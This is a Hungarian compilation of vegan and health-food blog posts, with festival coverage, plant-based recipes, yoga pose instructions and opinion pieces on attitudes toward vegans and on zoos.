Idén is megrendezésre került az év legnagyobb nyerstételes programja, a Zöldturmix Fesztivál Érdekes előadások és nyersételes kiállítók várták a vendégeket. Voltak szuperételek, voltak nyers édességek, főételek, volt isteni finom nyers kesusajt, torták, datolya, saláták, nyers szendvicsek, PlanetBIO szuperételek Dzsúzda Zöldturmix bár Datolyakirály :) Say Cheez Raw nyers vegán sajtok Nyers torták Veggie Nyers Vegán bisztro Levita gyönyörű nyers desszertek ééééééés kicsattanóan friss ZÖLD LEVELEK, amiből ott helyben készült zöld turmixokat lehetett kóstolni... a Zöldvital (HILLVITAL) standjánál zöld kóstoló sokféle zöld levél mutatkozott be Az asztalnál a hölgyek válaszoltak minden kérdésre... honnan, hogyan, mennyit és milyen arányban... Az elkészült zöld turmix ízlett mindenkinek, a zöld levelek sokfélesége, változatossága mindenkit gyönyörködtetett... A nagy érdeklődés mutatta, hogy az egészségre valóban van igény. Az emberek kíváncsiak, szeretnének többet tudni a környezetünk, a testünk működéséről. Hogyan tarthatnánk meg, vagy szerezhetnénk vissza egészségünket? A kulcs a természethez való visszatérés, minél több természetes étel fogyasztása, lehetőleg vegyszerek és feldolgozás nélkül. És itt a lényeg. Ez a sok friss zöld a nap erejét zárja magába, a klorofil erejével tisztít, táplál, feltölt oxigénnel, energiával, lúgosító ásványi anyagokkal. A Zöldvital szakértője, Budai Péter természetgyógyász, gyógynövény szakértő tartott a színpadon egy remek előadást a biodinamikusan termesztett növényekről, mikrobiológiáról, a talajban élő hasznos baktériumokról, és arról, hogy mindez hogyan szolgálja a mi egészségünket. És ez nem csak egy teória, egy álom. Az ország egy tiszta szegletében ezt egy gyönyörű biokertészetben meg is valósították, és ezek a csoda-zöldek már mindenki számára hozzáférhetőek. Zöldvital a zöld levél szállító Ők így látták a fesztivált, az írásukat olvashatod itt: Zöldben gazdag élmények a Zöldturmix Fesztiválon
Sütőben sült szilvásgombóc
Még Magyarországon jártunkkor kaptunk finom szilvát barátainktól, akik saját fájukról szedték. El is hoztuk Angliába, és egy részéből jó kis szilvásgombócot készítettem egészen egyedülálló módon, ugyanis nem főztem, hanem sütőben sütöttem a gombócot és nem lisztből, hanem kölesből és zabdarából készítettem. Tehát, ha bírod a zabpelyhet, akkor gluténmentesen is elkészítheted. Ha nem bírnád a zabpelyhet, kukoricadarát is használhatsz. Adagokat nem igazán mértem, de szerencsére látni, mikor lehet gombócot formálni a masszából. Dolgozhatunk fagyasztásból kiengedett szilvával, befőttel vagy sűrű lekvárral is.
A recept
Hozzávalók:
- 1,5 bögre köles
- darált zabpehely
- kókuszvirágcukor vagy gyümölcscukor vagy xylit vagy más édesítő
- víz
- növényi tej
- kb 20 darab szilva
- fahéj (ha azzal ízesítenénk a szilvát)
- mogyoró vagy dió vagy mandula
- sütőpapír
- kókuszzsír
- agavé vagy datolyaszirup
Elkészítés:
A kölest alaposan mossuk át, majd egy lábosban öntsük fel a kétszeres mennyiségű vízzel és fedő alatt kis lángon főzzük meg, időnként megkevergetve. Amikor a víz elfőtt róla, adjunk hozzá annyi növényi tejet, ami épp ellepi és főzzük tovább. Ha elfőtte a növényi tejet is, zárjuk el a hőt alatta, és hagyjuk a fedő alatt pihenni addig, míg a szilvát előkészítjük.
A szilvákat mossuk meg, vágjuk félig ketté és vegyük ki a magjukat. Ha úgy jobban szeretjük, meghinthetjük egy kis cukorhelyettesítővel és fahéjjal. Én inkább a szilva ízét szeretem, sem mint fahéjasan.
Ha kissé kihűlt a köles, édesítsük és adjunk hozzá annyi zabdarát, amennyit magába vesz, amivel könnyen formálható gombócokat tudunk készíteni. Majd enyhén nedvesített kézzel formázzunk púpos evőkanálnyi adagokból gombócokat úgy, hogy a közepükbe szilvát teszünk. A köleses masszát elterítjük a tenyerünkben, beletesszük a szilvát és gombócot formálunk.
Sütőpapíros tepsibe helyezzük, épp csak egy aprónyi kókuszzsírt kenünk a gombócok tetejére, majd előmelegített sütőben kb. 20 perc alatt kisütjük. Amíg sül, mogyorót vagy diót vagy mandulát vagy mákot darálhatunk, abba hempergetve kész a finom és ízletes köleses szilvásgombóc.
Tálalásnál agavé vagy datolyaszirupot csepegtettünk a gombócok tetejére.
Az emberek gyűlölik a vegánokat. Freud segíthet megérteni, miért – 2. rész
A cikksorozat első részében beszéltünk a reakcióképzésről, ami az önbecsapás fajtája, és körülbelül úgy hangzik, hogy “A hús talán gyilkosság, de nagyon fincsi gyilkosság. A cikksorozat további részeiben bemutatunk más pszichés folyamatokat, amikkel a mindenevők áltatják magukat, és amik miatt ellenérzésük lehet a vegánokkal szemben. Fordítás a következő cikkről: http://veganchowhound.com/rants/people-hate-vegans-freud-could-explain-why/ Fordította: Kertész Tibor 2. Izoláció (Elszigetelés) Louis C.K. egy brutálisan őszinte srác. Nézd meg ezt a rövid videót. Louis C.K. összegzi azt, amit valószínűleg sok mindenevő érez, még akkor is, ha ők közel sem lesznek ennyire őszinték soha. Ez a viselkedés az izolációnak hívott védelmi mechanizmus. Az izoláció az érzelmek elkülönítését jelenti a gondolatoktól és eseményektől. Ha az emberek meg akarnak tenni valamit, de tudják, hogy az rossz, ezzel a technikával könnyen el tudják távolítani a kellemetlen érzelmeket. Kit érdekel, hogy az állatokat megkínozzák és megölik? És akkor mi van, ha az ipari állattenyésztés elpusztítja a bolygót? Ugyan már. Kit érdekelnek a kizsákmányolt munkások? Kit érdekelnek az afrikai éhezők? Nem kéne gyereket szülniük… Láttad már ezt a valóságban? Egészen biztosan láttad. Azok az emberek, akik az izoláció áldozatává válnak, szeretik kinevetni sőt utálni a vegánokat. Miért? Mert a vegánok éppen azokat az érzelmeket testesítik meg, amelyeket ezek az emberek megpróbálnak elnyomni. Igazán könnyű ezekben a helyzetekben az izoláció használata. Lehetővé teszi számunkra, hogy ne változtassunk semmit a viselkedésünkön és pontosan azt tegyük, amit akarunk. Mindannyian ezt tesszük. Te is ezt teszed, amikor elmész egy hajléktalan mellett. Sokkal könnyebbé teszi az életet. Miért aggódnál a globális felmelegedés, a népirtások, az Afrikában éhező emberek és az állatok jogai miatt? Sokkal egyszerűbb, ha nem törődsz vele. Ezért gyűlölik az emberek a vegánokat, ezeket a hülyéket, akik túl sok mindennel törődnek. Amikor valami nem érdekel, akkor könnyű meglovagolni az ,,ugyanmár-lovat és kinevetni azokat, akik szembe mernek nézni az igazsággal. Azokat, akik megengedik maguknak, hogy érzéseik legyenek. Nézd meg a világ állapotát. Lehet, hogy ezért létezik ez a sok borzalom, mert mi, a milliárdok akik a pálya szélén állunk, nem vagyunk képesek feldolgozni a szörnyű igazságot. Akik pedig kimondják az igazságot, azok elszigetelődnek és kilökődnek a társadalom tudatából. Az elnyomott érzelmek bármely ábrázolása vagy megszemélyesítése gúnyt, sőt gyűlöletet kelt. Amikor összetalálkozol ezekkel az emberekkel, ne feledd, hogy nekik annyira fáj az igazság, hogy képtelenek elviselni. Légy velük együttérző. Utálhatják a vegánokat, ez rendben van. 1. rész | 2. rész | 3. rész | 4. rész | 5. rész | 6. rész The post Az emberek gyűlölik a vegánokat. Freud segíthet megérteni, miért – 2. rész appeared first on VegaNinja.
édesburgonyás fritattafin
2017. október 10. Beautilicious
Ismeritek a laktató és isteni finom fehérjében gazdag fritattát? Nagyon finom étel, aminek senki sem tud ellenállni. Ezt a klassz ételt sokféleképpen el lehet készíteni, de így még tuti nem próbáltad. Édesburgonyával muffin formába öltve. Hozzávalók - 1 nagyobb édesburgonya - fél fej vöröshagyma - 2paradicsom - 125gr mozzarella - 4tojás - 30gr zabliszt - só, bors Így készítsd - A megtisztított burgonyát reszeld le - A hagymát dinszteljük meg, majd adjuk hozzá az apróra vágott paprikát és paradicsomot - Add hozzá a reszelt burgonyát és keverd össze - A tojásokat verjük fel, majd keverjük össze a zöldségekkel - Keverjük hozzá a lisztet, sót,borsot - Reszeljük hozzá a sajtot - Adagoljuk muffin formába a keveréket - Süssük 30percig 180fokon
Édesburgonya pástétom
Hozzávalók:
1 csésze (2,5 dl) felkockázott édesburgonya
4 marék sótlan napraforgómag
1 kis fej lilahagyma
1 ek kókuszzsír
só ízlés szerint
1kk oregánó
1kk bors/borsikafű
1kk kakukkfű
1kk pirospaprika
[...] Bővebben!
répás almás pite
2017. szeptember 30. Beautilicious
Nézzük mi van a kamrában :D. Répa,alma..hmm..mi is készülhet ezekből a finomságokból? Egy klasszikus édesség amiért mindenki oda van? Igeeen! Pite készült, jó sok fahéjal (mert az alma, fahéj, répa trió verhetetlen:) ) Hozzávalók a tésztához - 2alma - 150gr tejföl - 150gr zabliszt - 80gr kókuszliszt - 20gr útifűmag héj - 3ek cukormentes sárgabarack lekvár - Fél citrom leve a töltelékhez - 4répa - 2alma - 1narancs leve - fahéj Így készítsd - A tésztához pürésítsd az almát, majd a tejföllel, lekvárral és a citromlével keverd össze - A száraz összetevőket keverd össze egy külön tálba, majd az almapürével alaposan gyúrd össze - Nyújtsd ki a tészta háromnegyedét - Tedd sütőbe 180fokre 15percig - Addig elkészítjük a tölteléket; Reszeld la a répákat és az almákat - Facsard hozzá egy narancs levét, majd tegyél hozzá fahájat ( ha nem elég lágy a töltelék, előfőzheted, mert akkor enged egy kis levet az alma) - Tölts meg a töltelékkel az elősütött tésztát, majd a maradékot is nyújtsd kis - Vágj csíkokat és helyezd rá olyan formában, hogy rácsos pitét kapj
madártej liszt nélkül
2017. szeptember 24. Beautilicious
Elhatároztam, hogy egyszer követek egy receptet, és az alapján késztem el a kedvenc édességemet. Ez nem jött össze. :D Ismét mentem a saját fejem után, de nem bántam meg. Hozzávalók - 1l tej - 4 tojás - 70gr édesítő - vanília aroma - 1 csipet só - 1púpos ek vaníliás pudingpor Így készítsd - A tejet tedd fel forrni egy kis vaníliával - A tojásokat válaszd ketté - A fehérjét verd kemény habbá 35gr édesítővel és egy csipet sóval, majd kanalazz kis galuskákat a tejbe és főzd oldalanként egy -egy percig - Csepegtesd le a galuskákat és tedd félre - A sárgáját keverd fehéredésig a maradék édesítővel, majd adj hozzá forró tejet és folyamatosan kevergesd - Tedd bele a pudingport is, és keverd csomómentesre - Öntsd ezt a keveréket a forró tejhez és főzd, míg besűrűsödik - Kanalazd bele a galuskákat és készen is vagy :)
Hozz tudatos döntéseket az élet minden pillanatában
2017. szeptember 19. Élj harmóniában
Az életedben minden pillanatban döntéseket hozol. Arról, hogy mit és hogyan gondolsz egy dologról, hogyan reagálsz egy szituációban, hogyan kommunikálsz, mit eszel, milyen könyvet olvasol, milyen zenét hallgatsz, kivel és miről beszélgetsz, etc. Ami a jelenben történik veled, korábbi döntéseid eredménye és a jelen pillanatban meghozott döntéseid, pedig kihatással lesznek a jövődre. Az, hogy ki hogyan viselkedik Veled az ő döntése, de az ahogyan Te reagálsz az Ő viselkedésére a Te döntésed. Minden pillanatban eldöntheted, hogy frusztrált, agresszív, dühös, szomorú, ingerült leszel, áldozatnak tekinted Önmagad vagy inkább elfogadó, szeretetteljes, kedves, nyugodt leszel... A rendszeres jógagyakorlás és a jóga elveinek megismerése és beépítése az életedbe segítenek fejleszteni a tudatosságod. Ezáltal a döntéseid is tudatosabbak lesznek, így békésebbé, boldogabbá válik az életed. Mielőtt döntenél gondold át, mi lesz a döntésed hatása, eredménye. Vajon a döntésed Önmagadnak és másoknak örömet, boldogságot, fejlődést hoz-e. Fejleszd a tudatosságod ma is :) szeretettel: Kati
A vörös grapefruit egy radioaktív kísérlet eredménye
A gyümölcsnek ez a variációja a szokásosnál édesebb, és majdnem úgy született, mint a Hulk.
Tégy a gerinced egészségéért! - Parsa Ardha Csandrászana (Fél hold állás oldalra)
2017. szeptember 12. Élj harmóniában
Az Ardha Cs andrászanáról (félhold állásról) egy korábbi bejegyzésben már írtam, itt olvashatod. Most ennek a jógapóznak egy változatát ajánlom a figyelmedbe, amikor a kivitelezés oldalsó irányba történik. Ez jógapóz erősíti a lábakat és a stabilizáló izmokat, javítja a testtartásod, jól kompenzálja az ülő munka okozta hatásokat. A félhold állás oldalsó változata szuper jól nyújtja az oldalsó törzsizmokat, csípő körüli izomzatot. E rősíti a gerincet és nyújtja a hátat is. Ez a jógapóz jól energetizálja a testet, serkenti a szív és a tüdő munkáját. Kedvezően hat a máj, a lép és a vesék működésére. Hogyan végezd el? - Állj meg összezárt lábakkal - Tádászanában (hegytartásban) - ha ez még nehéz akkor lehet csípő széles terpesz a két lábad között. - A két talpadon egyformán oszlasd el a testsúlyt. Majd aktivizáld a lábakat. talpakat told le jól a matracba, húzd fel a térdkalácsokat és legyenek aktívak a combjaid is. - A medencédet tartsd stabilan - aktív a hasizom, farizom. és nyújtóz z hosszan az egész gerinceddel fölfelé. - Emeld a két kezed a magasba - ha tudod tedd össze a tenyereket, ha ez még nehéz, akkor vállszélességben maradhatnak a karok. - Belégzéssel dönts bal oldalra - figyelj rá, hogy a medencédet ne told el. Amennyiben már bemelegedtél, előkészült a tested, gyakorlott jógázó vagy, úgy kilégzéssel dönts oldalra. - A két karod és a fülek egymás mellett, egy vonalban maradjanak Kijövetel a pózból belégzéssel gyere vissza középhelyzetbe és végezd el a gyakorlatot a másik oldalra is. A kitartás alatt stabilan tartsd a lábakat és a medencédet. Kilégzéssel a külső talpéleket és a nagylábujj tövét told a talajba. B elégzéssel húzd fel a térdkalácsot, tartsd aktívan a combokat. Belégzéssel próbálj nyújtózni fejtetővel, sz egycsonttal és a karokkal is az ég irányába. A hasadat, derék táji szakaszt, medencédet tartsd végig stabilan. A picit behúzott farokcsontb ól nyújtózz az egész gerincoszloppal folyamatosan. A lapockáidat simítsd a hátadba és próbáld belégzéssel nyitni a mellkast folyamatosan azáltal, hogy távolítod a két kulcscsontot - úgy dolgozz, ahogy Tádászanában (A tádászanáról itt olvashatsz). Amennyiben gerincsérved van ne gyakorold ezt a jógapózt. Tüdőtágulat esetén és kezeletlen magas vérnyomás esetén se gyakorold ezt a pózt. Akkor se gyakorold ezt a pózt ha szédülsz, érszűkületed, esetleg érelmeszesedésed van, vagy valami gond van a központi idegrendszereddel. A jógagyakorlatokat először mindig hozzáértő jógaoktatóval sajátítsd el. J ó gyakorlást kívánok:) szeretettel: Kati
Gyors banános édesség
2017. augusztus 28. Gitta nyersétel blogja
Amikor eljön a délutáni szénhidrát éhség (igen, van ilyen), akkor jó, ha van kéznél egészséges édes-falat, amit lehet enni. Sokan ismerik már ezt a banános trükköt, most megosztom veletek is. Kakaós banán Hozzávalók: 2 banán 1 kanál kakaópor (lehetőleg tiszta kakaópor legyen) Elkészítés: A banánt villával szétnyomkodjuk... maradhat kicsit darabos Itt még csak a banán van villával szétnyomva És ráteszünk egy evőkanál jó minőségű kakaóport, én PlanetBIO kakaóport használok, mert bio, tiszta, jó helyről van, megbízható. Pillanatok alatt készen van Opcionális a maca por, egy különleges szuperétel, ami most az enyémben is landolt, de enélkül is fantasztikus, gyors, finom édes, természetes délutáni nasi.
Gesztenyelisztes zabos gofri - vegán
Az a különleges eset esett meg velem, hogy elfogyott a hajdina itthon... Jah, más évekig elvan nélküle. :) De ez olyan nálam, mint másnál a búzaliszt. Akkor jutott eszembe, hogy gesztenyelisztet viszont kaptam a sógornőméktől, és még nem használtam el. Tán csak működik azzal is. És igen, csak kevesebb édesítésre van szüksége, mint a hajdinás változatnak. A gyerekek tömték. :) Hozzávalók: 1 bögre gesztenyeliszt 1 bögre zabliszt 3 ek szezámmag ledarálva 1 ek lenmag ledarálva növényi tej (mandula volt) sztívia 3 ek olivaolaj 1 tk sütőpor vanília 1 csipet só Az olajat másfél bögre tejjel és a sztíviával összeöntjük, a száraz hozzávalókat összekeverjük szárazon, majd a folyadékokkal is. Ha sűrű, még adhatunk hozzá tejet addig, amíg hígabb galuskatésztát nem kapunk. Előmelegített gofrisütőben jó 5 perc alatt sül meg. Kicsit hamarabb, mint a hajdinás változata.
Chole masala
2017. augusztus 19. Vegán muflon
Azt mondom, használjuk ki az utolsó napot, amikor még csatakos vízibivalyra izzadhatjuk magunkat a sparhelt mellett! És szigorúan olyan dolgot főzzünk, melyből valami pusztítóan, mocskosul csípős dolgot lehet kihozni, hogy egy nagy kiterjedésű Afrika-térkép rajzolódjon ki felsőruházatunk hátulján! Erre pedig egy indiai csicseriborsó-curry tökéletesen alkalmas. És tekintettel arra, hogy a hőségtől máris előjött belőlem az antiszociális, bőrizomtömlős bödönparaszt, a receptet rendhagyó módon fogom közölni, hogy bosszantsam az olvasókat.
:kólavázzoH
(vreznok) ósrobirescisc g004 (vreznok) moscidarap g004 amygahalil bbesik jef 2 amaygahkof dzereg 2 rébmöyg iynjjukylevüh 1 ynémök iamór kt 1 alasam marag kt 1 rednairok tlörő kt 1 amukruk kt 1 ropilihc kt 1 jetzsukók ld 1 dlözrednairok rokosc 1 rsob etekef ós Najó, ezzel leginkább magamat sikerült felidegesítenem, úgyhogy folytassa így a tököm vízkeresztkor! Tehát: A lilahagymát, a foghagymát és a gyömbért egy aprítóba dobjuk, összemixeljük és félretesszük. (Már-már közhely, hogy turmixgépet mosogatni arany!) Közben egy mély serpenyőben gyanút keltő magatartással kevés olajat hevítünk, hozzáadjuk a fűszereket, és közepes tűzön egy percig kevergetve pirítjuk őket. Majd jöhet rá a lilahagymás mixtúra, ezt további három percig tutujgatjuk a tűzön. Hozzápasszítjuk a paradicsomot, majd a lecsepegtetett csicseriborsót, némi vizet, majd addig főzzük, míg a csicseriborsó meg nem puhul. Legvégül hozzáadjuk a kókusztejszínt, a felaprított koriandert, sózzuk, borsozzuk, majd rizsával megzabáljuk.
omlós töltött keksz
2017. augusztus 18. Beautilicious
Rábukkantam a kamrában egy kis répára, amikkel kezdeni kellett valamit. Nagyon vágytam már egy finom puha kekszre, így nem gondolkodtam sokat. Megalkottam egy répás, fahájas kekszet méghozzá narancsos krémsajtos töltelékkel. Egyszerű és finom, ráadásul hamar elkészíthető. Hozzávalók - 150gr répa - 65gr cukormentes sárgabarack lekvár - 3tojás - 150gr zabliszt - 80gr kókuszliszt - 20gr útifűmag héj - 50gr édesítő - fél csomag sütőpor - fahéj, szerecsendió - 200gr krémsajt - 2ek édesítő - 1 narancs héja Így készítsd - A megtisztított répát a lekvárral és tojásokkal turmixold össze - Keverd össze a fűszereket, édesítőt, liszteket, az útifűmaghéjat és a sütőport - Öntsd bele a répás keveréket és a massza háromnegyedéből formázz kis korongokat és tedd tepsibe - A krémhez keverd össze a krémsajtot 2ek édesítővel és narancshéjjal, majd tegyél belőle mindegyik korong közepére. - Fedd le a krémet a maradék masszával - Tedd 180fokos sütőbe 15 percre és már kész is :)
Tejberizs
2017. augusztus 17. Beautilicious
Változatos, tápláló és egészséges. Mi az? A válasz az isteni tejberizs, amit szinte bármivel passzol. Eheted lekvárral, magokkal... bármivel, szinte akármivel finom. Hozzávalók - 150gr barnarizs - 300gr víz - 500ml tej/növényi tej - csipet só - vanília - 2ek édesítő Így készítsd - A rizst a vízzel és a csipet sóval főzd puhára - Add hozzá az édesítőt és a vaníliát - Folyamatosan öntsd hozzá a tejet egészen addig, míg a rizs krémes állagú nem lesz - Tálald ízlésed szerint kakaóval, fahéjjal, lekvárral.....:)
Emeletes rizspuding
2017. augusztus 15. Kertkonyha
Búcsú a gyümölcsbőségtől Ilyenkor ősszel kisebbfajta pánik lesz rajtam úrrá. Szabályosan megrémít, hogy nemsokára fél éven keresztül csak almán, banánon és narancson kell majd élnem. Már megint? Hiszen alig volt nyár! Nem adom a gyümölcseimet! :) Hát, de. Lehet kicsit trükközni a mélyhűtöttekkel, de végül is, muszáj lesz. Mit csináljak? Rossz égővre költöztem, annyi szent. :) Viszont addig is minden bevásárlás úgy végződik, hogy el sem kezdődik, mert az összes szatyrot és hűtőben a helyet elfoglalják a gyümölcsök. :D És egy újabb ilyen édesség következik, a piros gyümölcsök legvégéből.
Tofu kőrözött
Vegánként sem kell lemondani a kőrözöttről, tofuval ugyanis szinte ugyanaz az íz létrehozható, mintha túróval készítenénk. A kulcs a fűszerezésben van. Ha füstölt tofuval készítjük, szerintem még finomabb, de használhatunk ízesített tofut is hozzá. Szuper recept, mert gyorsan kész, kevesebb, mint 30 perc alatt összehozható. Finom szendvicseket készíthetünk vele. Friss paprikával, paradicsommal fogyasztva igazán ízletes.
A recept
Hozzávalók:
- 1 csomag tofu
- 1 lilahagyma
- 1 szál újhagyma (elhagyható)
- 2 gerezd fokhagyma
- 1 tk. édes pirospaprika
- házi ételízesítő
- őrölt köménymag
Elkészítés:
A hagymákat megpucoljuk. A lilahagymát egészen apróra vágjuk, az újhagymákat felkarikázzuk, a fokhagymákat átnyomjuk fokhagymaprésen. A tofut áttörjük, az apróra vágott lilahagymát, az újhagyma karikákat és az áttört fokhagymát hozzátesszük. Hozzáadjuk a fűszereket és összekeverjük.
Töltött paprika
2017. augusztus 7. Vegán receptek Tőlünk Nektek
Hozzávalók:
- 7 db nagyobb paprika
- 1 üveg sürített paradicsom püré ( 360 grammos)
- 2 közepes fej hagyma
- pár szem paradicsom (elhagyható)
- 1 bögre barnarizs
- 1/2 bögre szójagranulátum
- 2x 1 dl szójaszósz
- 1 kg burgonya
- bors, kömény, őrölt babér, só, cukor, pici mustár, 1 leveskocka
- 4 gerezd fokhagyma
- pici olaj, liszt a rántáshoz
Ez a recept anyukám töltött paprikája vegánosítva, ami abból áll, hogy a paprika töltelékét sajátosan oldom meg:
Megfőzöm a barnarizst 3-szoros mennyiségű vízben, melybe beledobok egy leveskockát is. Beáztatom a szójagranulátumot annyi vízben, hogy jól ellepje. Mikor beledagad, szójaszószt és borsot teszek hozzá. Mikor a rizs kicsit kihűlt, összekeverem a szójagranulátummal, 1 fej apróra vágott hagymával, a 4 gerezd fokhagymával, mustárral, babérral és köménnyel, majd pihentetem kicsit. (Fontos, hogy "ízes" legyen. Lehet kicsit eltúlozni a fűszereket, mert a paradicsom püré, a krumpli, de még a paprika is semlegesíteni fogja.)
Közben a burgonyát megpucolom, kockára vágom, majd sós vízben megfőzőm.
A paprikákat kicsumázom, és elegánsan beletöltöm a rizses alapomat, majd egy tepsibe fektetem őket egymás mellé szorosan. Mikor kész, rádobálom a másik hagymát is, melyet karikára vágok fel, majd a paradicsomokat összeszelve ráhelyezem a tetejére. Ezután leöntöm olajjal, szójaszósszal, és én megszórtam egy kis kakukkfűvel is. Lefedem fóliával, és a 220 fokos sütőben jó sokáig sütöm.
Készítek egy rántást, a paradicsom pürét vizzel kikeverve beleöntöm a kész rántásba, kevergetem, majd cukrozom és sózom. Mi édesen szeretjük. Beleraktam legalább 4 kanál cukrot, de ez ízlés szerint alakítható.
Tálalásnál a krumpli mellé teszem a paprikát, ami meg van töltve, és igyekszem úgy szedni, hogy sült hagyma és paradicsom is kerüljön a tányérra. Erre öntöm rá a forró és édes paradicsom szószt.
Jó étvágyat!
paradicsomos zsemle
2017. augusztus 6. Beautilicious
A nyári melegben a sok édes, hűsítő finomság mellett sem szabad elfeledkeznünk az egészséges és változatos táplálkozásról. A paradicsom egy örök kedvenc, ami nem csak feldobja, de még egészségesebbé is teszi ételeinket. Ma úgy döntöttem, hogy ezt a fonom zsemlét fogom feldobni egy kis paradicsommal. Hozzávalók - 200gr zabliszt - 75gr lenmagliszt - 25gr tökmagliszt - 2tk olívaolaj - 4tojás - 25gr ketchup - só, bazsalikom - fél zacskó sütőpor - 200gr paradicsom Így készítsd - A tojásokat keverd össze a ketchuppal és az olajjal és a felkockázott paradicsommal - A száraz alapanyagokat keverd el egy külön tálba - Keverd hozzá a paradicsomos, tojásos keveréket - Formázz kis zsemléket, majd helyezd őket sütőpapírral bélelt tepsibe - Süsd 180fokon 25percig
A jövő állatkertje – 7D hologramos állatok Japánban?
Nemrég egy érdekes videó kezdett el terjedni a neten: a cím szerint egy új japán állatkertben vették fel, ahol vadi új 7D technikával jelenítik meg a hologram állatokat, akiket nem csak látni, de tapintani is lehet, és a látogatók még az állatok szagát is érzik. A kattintás után megnézheted a videót! A fenti videó sajnos hoax, azaz nem létezik ez a varázslatos japán hologram-állatkert. A videó valójában a National Geographic kampánya volt, az úgynevezett augmetned reality (kiterjesztett valóság) technikát használva egy képernyőn önmagát láthatta a közönség, és ezen kívül a 3D állatokat, akik az emberek mozgására reagáltak. Ha játszottál a Pokemon GO-val, akkor ismered az augmented realityt. Az alábbi videóval, amit ráadásul a budapesti Allee-ban vettek fel, könnyebb lesz elképzelni, hogyan működik. Azért meg kell, hogy mondjam, nagyon reménykedtem, hogy a hír igaz. Az állatkert egy borzalmas és kegyetlen hely az állatok számára. Mindannyian láttunk olyan fotókat állatkerti állatokról szerte a világból, amin elfacsarodott a szívünk. Soványak, megtörtek, hiányos a szőrük, és a szemükben már nincs fény. Nézd meg a galériát: Kattints ide a diavetítéshez. Elmondhatjuk, hogy a magyarországi állatkertekben valószínűleg ennyire nem néznek ki rosszul az állatok. De azt senki nem gondolhatja komolyan, hogy egy gorillának így kellene élnie: A gorillák csapatban élnek, és csapatonként kb. 40 négyzetkilométeres (!) territóriummal rendelkeznek a vadonban. Ehhez képest sehol sincs még egy viszonylag nagy állatkerti kifutó sem. A vadállatok óriási távolságokat tesznek meg egy-egy nap alatt, feladatokat oldanak meg, élelmet keresnek, és igen, gyakran menekülnek is. Képzeljünk el egy sportolót, akit az orvosa eltilt a mozgástól. Őrjítő dolog. Most képzeljük el, hogy ugyanez a sportoló egy 100 négyzetméteres lakásba van bezárva. Persze, a gyerekek szeretnek állatkertbe menni. Szeretik az állatokat, érdekli őket, hogyan néznek ki élőben, és nyilván nem tűnik fel nekik, ami nekünk, felnőtteknek már igen, hogy a nagymacskák és a farkasok csak oda-vissza cikáznak a rács mögött, hogy dülöngél az elefánt az őrülettől… Megszoktuk, hogy úgy tekintünk az állatokra, mint alsóbbrendű lényekre, akiket legyőztünk, és nem érdemlik meg, hogy a saját életük felett rendelkezzenek. De ezt a megszokást meg kell kérdőjeleznünk, ha szeretnénk egy jobb világot gyerekeinknek. Empátiával kell fordulnunk feléjük, akár beleképzelni magunkat a helyükbe, és be kell látnunk, hogy ezeket az állatokat börtönbe zártuk, pedig nem követtek el bűnt. A kis zsiráf megkérdezi az anyukáját: – Anya, miért ilyen hosszúak a szempilláim? – Hogy a szaharai homok ne menjen a gyönyörű szemeidbe, drágám. – És anya, miért vannak paták a lábaim végén? – Az pedig azért, hogy a forró homok ne égesse a talpacskáidat. – És a nyelvem meg a nyakam miért ilyen hosszú, anya? – Hát azért, hogy a nagy szárazságban azokat a leveleket is elérd, amik más állatok számára túl magasan vannak. – Akkor csak egyet nem értek: mit keresünk a Budapesti Állatkertben? A régi vicc inkább szomorú, mint vicces. Ők nem tartoznak erre az égtájra, nem erre fejlődtek ki az evolúció során. Ez is csak egy olyan dolog, amit mindenki tud, mégis nagyon kevesen kérdőjelezik meg azt, hogy vajon jól van-e ez így. Az érvek között szerepel, hogy szegény gyerek hogyan lásson állatokat, ha nem így? Vajon a dinókért miért rajong egy csomó gyerek? Sosem látott ma élő ember valódi dinoszauruszt, mégis sok gyerek (és persze felnőtt) óriási lexikális tudással rendelkeznek róluk. Ehhez nem kellenek élő állatok. Azzal nem tudok vitatkozni, hogy a gyerekek és állatok között létrejövő kapcsolat szinte minden esetben megváltoztatja a gyerek életét. Ámulattal tölti el őt az állat látványa, érintése, közelsége. Figyelni az állatot, amint teszi a dolgát, éli az életét: egy igazi csoda. De ilyen tapasztalatot nem kap az állatkertben, ott az állatok viselkedése sem természetes. Nézzünk természetfilmet, vagy menjünk el túrázni egy erdőbe, figyeljük meg a közelünkben élő madarakat, vagy ha mindenképp egzotikus állatot szeretnénk látni, keressünk egy menhelyet. Például a Noé Állatotthon lakói nem a profit miatt élnek ott, hanem mert valamiért nem engedhetők vissza a vadonba, ideiglenesen vagy véglegesen. Noé Állatotthon Azzal is szeretjük magunkat áltatni, hogy az állatkertek valamiféle megmentő szerepet töltenek be az állatvilágban. Ez is hazugság. Az állatkertek a profit miatt jöttek létre, a belépőjegy-vásárlások és esetleges állami támogatások tartják fent őket, ugyanolyan profitorientált intézmények, mint egy vidámpark vagy plázamozi, csak épp élő áldozatai (rabjai) vannak. Ha jegyet veszünk, további állatok befogását, szaporítását és rabosítását támogatjuk a pénzünkkel. A zsiráfokat és az orrszarvúkat nem Európa közepén kell megmenteni, ezt szerintem nem kell magyaráznom. Ez csak egy ocsmány PR fogás az állatkertek részéről, elég csak megnézni az elmúlt években, állatkertekben kilőtt vagy más módon megölt állatokat. Az oroszlánsimogató parkok egy más kategória – sajnos nem a jó okokból. Itt írtunk róla, hogy hogyan ölik meg a szelídített oroszlánokat, akiket jóhiszemű önkéntesekkel nevelnek fel. Általános állatvédelmi “szabály”, hogy ha egy tevékenységben szerepet játszik a pénz és az állatok, akkor az szinte kivétel nélkül azt jelenti, hogy az állatok kihasználásáról van szó. Itt olvashatsz a szórakoztatóipari állatokról bővebben. Ahogy a Vegán Állatvédelem Egysület mottója mondja: Az állatok nem értünk vannak itt, hanem velünk. A saját életük, biztonságuk és szabadságuk a legfontosabb számukra, ahogy számunkra is. Menekülnek, vigyáznak magukra, vigyáznak egymásra. Nem tehetjük meg velük azt a rengeteg borzalmat tiszta lelkiismerettel, amit ma teszünk velük. Jobbat érdemelnek. Szívből remélem, hogy a hologram állatkert hamarosan valóság lesz, és egy nap nem kell állatkertbe születnie egyetlen állatnak sem csak azért, hogy gyerekeket szórakoztasson. The post A jövő állatkertje – 7D hologramos állatok Japánban? appeared first on VegaNinja.
Tökfőzelék nyersen, még egyszer
2017. július 29. Gitta nyersétel blogja
